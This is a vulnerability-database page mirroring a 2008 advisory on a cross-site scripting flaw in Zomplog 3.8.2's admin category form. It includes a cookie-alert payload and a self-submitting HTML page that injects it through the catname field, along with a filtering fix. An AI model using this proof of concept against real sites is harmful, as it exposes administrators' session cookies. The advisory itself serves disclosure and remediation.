Lucene search

zomplog-xss.txt

🗓️ 02 May 2008 00:00:00Reported by IRCRASHType

packetstorm🔗 packetstormsecurity.com👁 19 Views

Zomplog 3.8.2 XSS Vulnerability. Admin cookie can be stolen through a crafted POST request. Solution: Filter catname variable with htmlspecialchars function

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`----------------------------------------------------------------  
Script : Zomplog 3.8.2  
Type : XSS Vulnerability  
----------------------------------------------------------------  
Discovered by : Khashayar Fereidani Or Dr.Crash  
Our Team : IRCRASH  
----------------------------------------------------------------  
Our Site : Http://IRCRASH.COM  
IRCRASH Bugtraq : Http://BUGTRAQ.IRCRASH.COM  
----------------------------------------------------------------  
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr  
----------------------------------------------------------------  
Script Download : http://www.zomp.nl/user-content/downloads/zomplog/zomplog-3.8.2.tar.gz  
----------------------------------------------------------------  
URL : http://example/zomplog/admin/category.php  
Xss Method : Post  
variable : catname  
Query For Send : " [XSS CODE]  
Example : Send With Post : " <script>alert(document.cookie)</script>  
And Set addcat variable "Submit" .....  
----------------------------------------------------------------  
If Administrator User Open This File Administrator Cookie Show In Page ...  
HTML PAGE FOR GET ADMIN COOKIE :  
<html>  
<head></head>  
<body onLoad=javascript:document.form.submit()>  
  
<form action="http://example/zomplog/admin/category.php"  
  
method="POST" name="form">  
  
<input type="hidden" name="catname" value="&#x22;&#x20; <script>alert(document.cookie)</script>">  
<input type="hidden" name="addcat" value="Submit">  
  
</form>  
</body>  
</html>  
----------------------------------------------------------------  
Solution : Edit Source Code And Filter Catname Variable With htmlspecialchar() function .......  
----------------------------------------------------------------  
TNx : God......  
Khashayar Fereidani Email : irancrash[at]gmail[dot]com  
----------------------------------------------------------------  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

02 May 2008 00:00Current

7.4High risk

Vulners AI Score7.4